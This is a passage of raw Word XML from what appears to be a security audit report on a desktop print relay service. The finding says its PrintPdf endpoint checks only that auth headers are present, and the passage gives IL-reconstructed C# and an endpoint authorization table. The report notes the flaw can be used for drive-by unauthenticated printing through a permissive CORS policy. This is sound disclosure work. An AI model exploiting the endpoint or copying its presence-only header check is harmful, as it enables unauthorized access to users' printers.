    <w:p w14:paraId="74EEF0B2" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The PrintPdf action enforces no authorization whatsoever. It checks only that the three headers X-ProviderValidationUrl, X-AccessToken, and X-ClientSecretJwt are present and non-empty (any arbitrary value satisfies this) and that the supplied document type resolves to a known print queue. It then prints the supplied PDF. Unlike the sibling actions PrintPdfWithCopies and PrintZpl, it never calls the token validator at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D94D53A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Consequently, even without the validator weakness described in the Critical finding, this endpoint permits unauthenticated printing of arbitrary attacker-supplied PDF content to the workstation's mapped printers. Combined with the permissive CORS policy, it is exploitable as a drive-by from any website the user visits. The table below summarizes authorization enforcement across the controller's actions, illustrating the inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="94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0"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="1820"/>
        <w:gridCol w:w="1660"/>
      </w:tblGrid>
      <w:tr w:rsidR="009C1336" w14:paraId="6D25A596" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21C4CF97" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Endpoint / action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="165C8C34" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Presence check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1820" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="777B7124" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Token validated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55B07281" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Sensitive sink</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="2EF417F6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="584E6CD1" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>printers/{docType}/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>print/pdf  (PrintPdf)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53B17B8C" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1820" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5ADD79BB" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D93ECE5" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Prints PDF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="2F1B6152" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6547FB20" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /printers/print/pdfWithCopies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1579F4C3" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1820" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02AF932B" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes (bypassable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24AD802F" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Prints PDF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="7895F48F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="487153E4" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>printers/{docType}/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>print/zpl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EAC2825" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1820" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D8CF6DE" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes (bypassable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53E7A446" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Raw ZPL to printer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="1EFA386E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BD3F7B4" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>* /printers/print-doc-type-map/...  (SetPrintDocTypeMap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DD281A3" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1820" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FC454D6" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79F74AB7" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Writes routing map</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1336" w14:paraId="579747B6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0053A7CF" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET printer names / detail / status / maps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24596D7E" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1820" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15CA4495" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0BB5C6C6" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61A6EA48" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B76ABD7" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>EVIDENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AB2F38" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Code Source Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3F6890" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Binary File:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DesktopPrintRelayService.Host.exe (v1.0.0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179B2179"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355FEB89" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Namespace:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ScriptMed.DesktopPrintRelayService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDBB2AC" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Class:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PrintController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76624A65" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Method:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PrintPdf()  —  POST /printers/{printDocType}/print/pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CD03B2" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Variable/String:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Missing [Authorize] attribute; presence-only IsNullOrEmpty header checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B139902" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Source (where it comes from):  </w:t>
      </w:r>
      <w:r>
        <w:t>Headers X-ProviderValidationUrl / X-AccessToken / X-ClientSecretJwt (checked for presence, never validated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E1B74C" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Code Pattern:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0341A2B9" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFCCCC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>if (IsNullOrEmpty(providerValidationUrl)) return BadRequest(...);  // no isUserTokenValid call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080C4AF5" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Full Code Snippet (IL-reconstructed):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA451E0" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[HttpPost]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[Route("printers/{printDocType}/print/pdf")]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// MISSING: [Authorize] attribute!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public IActionResult PrintPdf(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    // presence-only checks; NO call to isUserTokenValid anywhere in this action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if (IsNullOrEmpty(content))               return BadRequest("PDF bytes must be provided");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if (IsNullOrEmpty(providerValidationUrl)) return BadRequest("X-ProviderValidationUrl ...");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if (IsNullOrEmpty(accessToken))           return BadRequest("X-AccessToken ...");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if (IsNullOrEmpty(clientSecretJwt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>))       return BadRequest("X-ClientSecretJwt ...");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    queue = GetPrintQueueForPrintDocType(printDocType);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    PdfPrinting.PrintPdf(content, queue, documentName, ...);   // prints, UNAUTHENTICATED!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE5EA09" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="4B504CDC" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reconstructed control flow of the PrintPdf action (decompiled from IL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A17BD8" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68190B32" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// presence-only checks; NO call to isUserTokenValid anywhere in this action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF756D" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if (IsNullOrEmpty(content))            return BadRequest("PDF bytes must be provided");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D89E87" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if (IsNullOrEmpty(providerValidationUrl)) return BadRequest("X-ProviderValidationUrl ...");</w:t>
